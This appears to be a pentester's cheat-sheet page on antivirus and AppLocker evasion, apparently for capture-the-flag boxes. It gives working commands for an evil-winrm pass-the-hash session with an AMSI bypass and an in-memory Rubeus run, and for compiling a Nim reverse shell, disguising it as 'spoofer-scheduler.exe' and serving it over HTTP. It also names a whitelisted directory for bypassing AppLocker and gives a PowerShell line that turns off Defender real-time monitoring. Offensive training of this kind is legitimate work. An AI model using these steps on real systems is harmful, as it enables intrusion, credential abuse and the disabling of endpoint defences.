Evasion

AV Evasion

Antivirus (AV) Bypass - HackTricksbook.hacktricks.xyz

# On-Disk Evasion
- Packing tools like UPX compress and obfuscate executables
- Obfuscators reorganize code to prevent reverse engineering
- Crypters encrypt code and decrypt it in memory, leaving only encrypted data on disk

# In-Memory Evasion
- PE injection places payloads into process memory, avoiding disk writes
- Process hollowing replaces a process memory with code while retaining its original

AppArmour

Received "Access is denied". If AppLocker is configured with default AppLocker rules, you can then bypass it by running it here: C:\Windows\System32\spool\drivers\color (Whitelisted by default)

evil-winrm

└─# evil-winrm -i box.htb -u administrator -H 000 -s /opt/transfer
*Evil-WinRM* PS C:\tools> menu
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\tools> Bypass-4MSI
[+] Success!
*Evil-WinRM* PS C:\tools> Invoke-Binary rubeus.exe

nim

# https://github.com/Sn1r/Nim-Reverse-Shell (Edit rev_shell.nim with IP and port)
apt install mingw-w64
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
export PATH=$HOME/.nimble/bin:$PATH

nim c -d:mingw --app:gui rev_shell.nim
mv rev_shell.exe spoofer-scheduler.exe
python -m http.server 8000

Disable RealTimeMonitoring

Set-MpPreference -DisableRealtimeMonitoring $true
Get-MpPreference | Select-Object DisableRealtimeMonitoring

PreviousIntro NextFile Transfers

Last updated 6 months ago

hashtagAV Evasion

hashtagAppArmour

hashtagevil-winrm

hashtagnim

hashtagDisable RealTimeMonitoring

AV Evasion

AppArmour

evil-winrm

nim

Disable RealTimeMonitoring